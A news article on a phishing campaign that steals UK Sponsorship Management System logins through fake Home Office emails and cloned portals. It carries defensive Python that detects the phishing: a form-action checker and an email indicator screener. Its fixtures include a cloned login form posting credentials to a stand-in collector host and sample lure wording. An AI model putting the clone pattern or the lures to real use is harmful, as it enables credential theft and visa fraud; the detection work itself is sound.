Home Office Phishing Scam Targets UK Visa Sponsorship System

Fake Home Office emails target the UK Visa Sponsorship System, stealing logins to issue fraudulent visas and run costly immigration scams.
Scammers targeted unsuspecting companies with emails that looked like something straight from the Home Office, complete with urgent compliance warnings and account suspension threats.
According to cybersecurity firm Mimecast, those messages were anything but genuine: they were part of a sophisticated phishing campaign targeting UK organisations that hold sponsor licences, a direct attempt to steal logins for the government’s Sponsorship Management System (SMS).
The SMS is the secure portal that approved sponsors use to manage visa applications, so having those credentials in the wrong hands opens the door to serious abuse. Mimecast’s researchers found that attackers are sending emails to generic company inboxes, warning of alleged compliance issues.
According to Mimecast’s research, compiled by Samantha Clarke, Hiwot Mendahun, Ankit Gupta and the Mimecast Threat Research Team and shared with Hackread.com, the links in those emails lead to convincing copies of the official SMS login page, complete with government branding and even CAPTCHA gates intended to get past basic security checks.
Once a victim enters their details, the credentials do not go to the government at all. Instead, they are sent to an attacker-controlled script. From there, the compromised accounts are used to issue fraudulent Certificates of Sponsorship.
In some cases, these are part of elaborate scams that create fake job offers, charging individuals between £15,000 and £20,000 for visa sponsorships that do not exist. The forged documents look authentic enough to pass early checks, making the fraud harder to detect until it is too late.
Technical analysis of the phishing pages shows they are almost identical to the real SMS portal, down to the HTML code and linked images. The only major difference is a small change in the login form’s action, pointing to the attacker’s server instead of the legitimate authentication process. It is a subtle modification that has huge consequences for victims.
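The check a defender can run against a suspected clone follows directly from that observation: parse the page, collect every form action, and flag any that would post credentials to a host other than the portal's own. The following is an added illustration, not Mimecast's tooling or the Home Office's code; the HTML pages, the expected host (`example-portal.gov.uk`) and the collector hostname are all constructed for the example and stand in for the real SMS address.

```python
"""Flag login forms whose action posts credentials to an unexpected host.

Added illustration, not Mimecast's or the Home Office's code. The sample
pages are constructed to mirror the pattern described in the report: a
faithful copy of a portal in which only the form action differs.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> element on a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":                      # HTMLParser lowercases tag names
            self.actions.append(dict(attrs).get("action") or "")


def form_action_hosts(html, page_url):
    """Return the hostname each form on the page submits to.

    Relative actions (including an empty one, which posts back to the page
    itself) are resolved against the page's own URL.
    """
    parser = FormActionCollector()
    parser.feed(html)
    return [urlsplit(urljoin(page_url, a)).hostname for a in parser.actions]


def suspicious_forms(html, page_url, expected_host):
    """Return the hosts that forms would send data to, other than the expected
    host or one of its subdomains. An empty list means every form is fine."""
    def trusted(host):
        return host is not None and (
            host == expected_host or host.endswith("." + expected_host))
    return [h for h in form_action_hosts(html, page_url) if not trusted(h)]


# Constructed sample values; the real SMS host is deliberately not used here.
EXPECTED_HOST = "example-portal.gov.uk"
PAGE_URL = "https://example-portal.gov.uk/login"

GENUINE_PAGE = """
<html><body>
<img src="/static/crest.png" alt="Home Office">
<form method="post" action="/login/authenticate">
  <input name="username"><input name="password" type="password">
</form></body></html>
"""

# Same markup and images; only the action changes (constructed collector host).
CLONED_PAGE = GENUINE_PAGE.replace(
    'action="/login/authenticate"',
    'action="https://collector.invalid/submit.php"')

if __name__ == "__main__":
    print("genuine page:", suspicious_forms(GENUINE_PAGE, PAGE_URL, EXPECTED_HOST))
    print("cloned page: ", suspicious_forms(CLONED_PAGE, PAGE_URL, EXPECTED_HOST))
```

Resolving relative actions against the page URL matters: a clone that keeps a relative action but is hosted on the attacker's domain also resolves to the wrong host, so the comparison catches both absolute and relative variants.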
Legal experts have warned that the fallout can be severe. Natasha Chell, Partner and Head of Risk and Compliance at Laura Devine Immigration, said some sponsors have already had their systems breached. She advised that organisations must protect their Home Office accounts through strong IT practices, regular training for key staff, and by verifying any suspicious requests directly with the Home Office before acting.
“We are aware of sponsors who have been targeted by these phishing scams and an unfortunate few who have had their systems breached. As gatekeepers of the sponsorship system, sponsors need to protect their Home Office online accounts by having robust IT practices, regular training for Key Personnel who have access to the accounts, and they should always contact the official Home Office channels to verify any suspicious requests.”
Natasha Chell – Laura Devine Immigration
Mimecast says it has already added detection rules to block these phishing emails for its customers, but the campaign continues to evolve. Indicators of compromise include subject lines such as “New Message in Your UKVI Account” or “System Notification – Action Required” and URLs mimicking official Home Office addresses with subtle alterations.
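Those indicators translate into a simple mail-screening rule: match the quoted subject lines, and treat any link whose host is not genuinely under the government domain as untrusted, even when it contains "homeoffice" or "gov-uk" as a substring. The code below is an added example, not Mimecast's detection rules; the two subject lines are the ones quoted above, while the trusted suffix (`gov.uk`), the sample messages and the lookalike hostname are assumptions constructed for the example.

```python
"""Screen an inbound email for the indicators quoted in the report.

Added illustration, not Mimecast's detection logic. Subject lines come
from the report; the trusted suffix and the sample messages are constructed.
"""
import re
from email import message_from_string
from urllib.parse import urlsplit

# Subject lines quoted in the report (dash normalised to ASCII, see below).
IOC_SUBJECTS = {
    "New Message in Your UKVI Account",
    "System Notification - Action Required",
}

# Assumption for the example: genuine Home Office links sit under gov.uk.
TRUSTED_SUFFIXES = ("gov.uk",)

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def normalise_subject(subject):
    """Fold en/em dashes to '-' and collapse whitespace before comparing."""
    s = subject.replace("\u2013", "-").replace("\u2014", "-")
    return " ".join(s.split())


def is_trusted_host(host):
    """True only if host equals a trusted suffix or is a subdomain of one.

    The test is on the registrable tail of the name, not a substring, so
    'homeoffice.gov.uk' passes while 'gov.uk.example.com' and
    'homeoffice-gov.uk' do not.
    """
    if not host:
        return False
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def assess_email(raw):
    """Return a list of findings for one plain-text message; empty if clean."""
    msg = message_from_string(raw)
    findings = []
    subject = normalise_subject(msg.get("Subject", ""))
    if subject in IOC_SUBJECTS:
        findings.append(f"known phishing subject: {subject!r}")
    for url in URL_RE.findall(msg.get_payload()):
        host = urlsplit(url).hostname
        if not is_trusted_host(host):
            findings.append(f"untrusted link host: {host}")
    return findings


# Constructed sample messages (sender, link and wording are invented).
PHISH = """From: alerts@ukvi-notify.example
Subject: System Notification - Action Required

A compliance issue was found on your sponsor licence. Sign in at
https://sms-homeoffice-gov-uk.example/login to avoid suspension.
"""

LEGIT = """From: colleague@sponsor.example
Subject: Sponsor licence renewal reminder

Guidance is at https://www.gov.uk/ as discussed.
"""

if __name__ == "__main__":
    print("phish:", assess_email(PHISH))
    print("legit:", assess_email(LEGIT))
```

A subject match alone is a weak signal (legitimate notifications can share wording), so in practice the two findings are best combined, with the host check carrying the weight.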
Sponsor licence holders are advised to use multi-factor authentication for SMS access, change credentials regularly, monitor account activity for unusual logins, and train staff to spot suspicious messages.
Additionally, verification should always happen through official channels, never via a link in an unsolicited email. In this case, a little caution can prevent attackers from using your organisation as a stepping stone for large-scale immigration fraud.
HackRead